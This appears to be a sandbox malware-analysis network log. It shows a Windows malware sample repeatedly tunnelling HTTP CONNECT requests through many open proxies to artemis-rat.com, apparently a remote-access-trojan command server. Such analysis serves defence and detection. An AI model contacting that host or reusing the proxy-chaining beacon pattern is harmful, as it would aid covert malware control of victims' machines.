                                              Content-Type: text/html
                                              Content-Language: en
                                              Content-Length: 43
                                              Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                              Data Ascii: You are not allowed to access the document.


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1035192.168.2.45328165.109.211.10131287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.612555981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.559771061 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1036192.168.2.45103851.75.126.150378477284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.628525019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.163237095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.663405895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.606612921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1037192.168.2.453287177.135.83.24456787284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.636496067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1038192.168.2.45327091.202.230.21980807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.639055967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1039192.168.2.45328823.137.248.19788887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.640723944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1040192.168.2.45325165.1.244.23210807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.661086082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.049596071 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1041192.168.2.453212197.242.146.10931287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.697222948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.171315908 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1042192.168.2.453289221.231.13.19810807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.697336912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1043192.168.2.453291178.54.21.20380817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.737164021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1044192.168.2.453343107.180.88.173365037284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.747170925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.367357016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.054414988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.367346048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.975095034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.663568020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1045192.168.2.45329387.106.114.12460057284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.750093937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1046192.168.2.453292171.250.221.19110807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.758835077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.553947926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1047192.168.2.453361104.19.79.238807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.767955065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.921956062 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1048192.168.2.453468152.32.132.2204437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.783094883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1049192.168.2.453469152.32.132.2204437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.783958912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1050192.168.2.453470152.32.132.2204437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.785587072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1051192.168.2.453380104.18.254.76807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.785644054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.940073967 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1052192.168.2.453473152.32.132.2204437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.786581993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1053192.168.2.45298464.227.108.25319087284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.794157982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1054192.168.2.45329746.35.9.110807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.802498102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.098275900 CET340INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.12.2
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Content-Length: 173
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1055192.168.2.45331413.38.176.10431287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.819770098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.116734982 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:21 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1056192.168.2.45337423.231.34.48807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.821399927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.012707949 CET401INHTTP/1.0 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm="login"
                                              Connection: close
                                              Content-type: text/html; charset=utf-8
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 32 3e 3c 68 33 3e 41 63 63 65 73 73 20 74 6f 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 64 69 73 61 6c 6c 6f 77 65 64 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 72 20 79 6f 75 20 6e 65 65 64 20 76 61 6c 69 64 20 75 73 65 72 6e 61 6d 65 2f 70 61 73 73 77 6f 72 64 20 74 6f 20 75 73 65 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>407 Proxy Authentication Required</title></head><body><h2>407 Proxy Authentication Required</h2><h3>Access to requested resource disallowed by administrator or you need valid username/password to use this resource</h3></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1057192.168.2.45336038.162.27.2031287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.830836058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.241631985 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1058192.168.2.45329643.155.165.196156737284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.833122969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1059192.168.2.4532988.213.128.9077797284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.837275028 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Mar 11, 2024 08:37:24.460268974 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1060192.168.2.45330043.131.245.216156737284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.840430975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1061192.168.2.453376157.185.157.151265897284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.840600014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1062192.168.2.453166117.160.250.163807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.910754919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.498274088 CET303INHTTP/1.1 400 Bad Request
                                              Server: openresty
                                              Date: Mon, 11 Mar 2024 07:37:22 GMT
                                              Content-Type: text/html
                                              Content-Length: 154
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1063192.168.2.453333185.158.114.14259837284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.911061049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1064192.168.2.451187213.136.79.177136757284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:21.914208889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.960167885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.054505110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.163377047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:46.197058916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:10.334950924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
